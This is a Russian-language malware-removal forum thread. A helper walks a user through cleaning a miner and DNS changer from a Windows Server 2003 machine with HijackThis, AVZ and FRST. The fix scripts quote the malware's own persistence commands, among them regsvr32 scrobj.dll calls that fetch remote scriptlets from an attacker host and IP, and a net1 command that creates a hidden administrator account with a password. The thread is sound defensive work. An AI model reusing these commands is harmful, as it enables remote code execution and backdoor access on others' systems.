Не удаляется JS.FTP1202.SITE, прошу помощи

Printable View

12.12.2019, 21:00
Thinker

Вложений: 1

Не удаляется JS.FTP1202.SITE, прошу помощи

Здравствуйте! Компьютер заразился майнером (и, похоже, еще DNS-change'ром), помогите, пожалуйста избавиться.
12.12.2019, 21:01
Info_bot

Уважаемый(ая) [B]Thinker[/B], спасибо за обращение на наш форум!

Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].

[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
13.12.2019, 07:02
Vvvyg

На DHCP замените DNS 223.5.5.5 на другой - провайдерский, Яндекс.

Запустите HijackThis, расположенный в папке Autologger (в [B]Windows Vista/7/8/10[/B] необходимо запускать через правую кнопку мыши [B]Запуск от имени администратора)[/B])и [url="http://virusinfo.info/showthread.php?t=4491"]пофиксите только эти строки[/url]:[code]O4 - HKLM\..\Run: [start] = C:\WINDOWS\system32\regsvr32.exe /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll
O7 - IPSec: Name: win (2019/12/12) - {f7d9f5cf-0dd5-48fc-95ff-c6d7ecae6bea} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2019/12/12) - {f7d9f5cf-0dd5-48fc-95ff-c6d7ecae6bea} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2019/12/12) - {f7d9f5cf-0dd5-48fc-95ff-c6d7ecae6bea} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2019/12/12) - {f7d9f5cf-0dd5-48fc-95ff-c6d7ecae6bea} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2019/12/12) - {f7d9f5cf-0dd5-48fc-95ff-c6d7ecae6bea} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O17 - HKLM\System\CCS\Services\Tcpip\..\{17266C7B-F506-4E68-8003-80CC4F8203A0}: [NameServer] = 223.5.5.5
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{17266C7B-F506-4E68-8003-80CC4F8203A0}: [NameServer] = 223.5.5.5[/code]Перезагрузите сервер.

Не выставляйте в интернет свою инфраструктуру, множество открытых портов, в т. ч. относящихся к Windows, а версия сервера 2003 давно не поддерживается.

[url="http://virusinfo.info/showthread.php?t=7239"]Выполните скрипт в AVZ[/url] при наличии доступа в интернет:[CODE]var
LogPath : string;
ScriptPath : string;

begin
LogPath := GetAVZDirectory + 'log\avz_log.txt';
if FileExists(LogPath) Then DeleteFile(LogPath);
ScriptPath := GetAVZDirectory +'ScanVuln.txt';

if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin
if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin
ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
exit;
end;
end;
if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
end.[/CODE]После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt, прикрепите его к сообщению.

Скачайте [URL="http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/"]Farbar Recovery Scan Tool[/URL] и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
13.12.2019, 20:57
Thinker

Вложений: 2

Благодарю за ответ, адрес заменен, прилагаю требуемые файлы.
13.12.2019, 22:48
Vvvyg

Содержимое папки C:\ownno известно?

[NOTICE]Загрузите систему в безопасном режиме[/NOTICE]
Выделите и скопируйте в буфер обмена следующий код:[CODE]Start::
"iGjh" => service could not be unlocked. <==== ATTENTION
HKLM\SYSTEM\ControlSet001\Services\iGjh => cmd /c net1 user admin$ Zxcvbnm,.1234 /ad&net1 localgroup administrators admin$ /ad&net1 localgroup administradores admin$ /ad&regsvr32 /s /u /n /i:http://78.142.194.116:8016/blue.txt scrobj.dll <==== ATTENTION (Rootkit!/Locked Service)
"uti3ndu1" => service could not be unlocked. <==== ATTENTION
HKLM\SYSTEM\ControlSet001\Services\uti3ndu1 => \??\C:\WINDOWS\system32\Drivers\uti3ndu1.sys <==== ATTENTION (Rootkit!/Locked Service)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => c:\Program Files\Malwarebytes' Anti-Malware\mbamext.dll -> No File
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => c:\Program Files\Malwarebytes' Anti-Malware\mbamext.dll -> No File
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckyoumm4\"",Filter="__EventFilter.Name=\"fuckyoumm3\":: <==== ATTENTION
Reboot:
End::[/CODE]Запустите FRST.EXE/FRST64.EXE, нажмите один раз [B]Fix[/B] и подождите. Программа создаст лог-файл ([B]Fixlog.txt[/B]). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

[QUOTE]Установите Service Pack 2 для Windows 2003[/QUOTE]Затем все остальные обновления.

Скачайте утилиту Universal Virus Sniffer [URL="https://yadi.sk/d/6A65LkI1WEuqC"]отсюда[/URL] и [url=https://virusinfo.info/showthread.php?t=121767&p=897810&viewfull=1#post897810]сделайте полный образ автозапуска uVS[/url].
16.12.2019, 06:22
Thinker

Вложений: 1

"ownno" - файл в корне, размер 0, до заражения вроде не было

fixlog.txt прикрепляю. Прочитав содержимое, от дальнейших шагов из предыдущего сообщения пока воздержался (на всякий случай, если вдруг потребуется сначала еще что-то сделать).
16.12.2019, 06:50
Vvvyg

Без обновления система остаётся крайне уязвимой.
И снаружи ничего не закрыли, ждите рецидива.
16.12.2019, 09:07
Thinker

Когда я писал, что воздержался от дальнейших шагов, я имел ввиду, только до вашего ответа (на случай, если вдруг, по результатам fixlog, понадобится что-то еще сделать, до установки обновлений)

[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]

[QUOTE=Vvvyg;1507088]И снаружи ничего не закрыли, ждите рецидива.[/QUOTE]
Можете написать номера 1-2 открытых портов для примера? Возможно, это было временно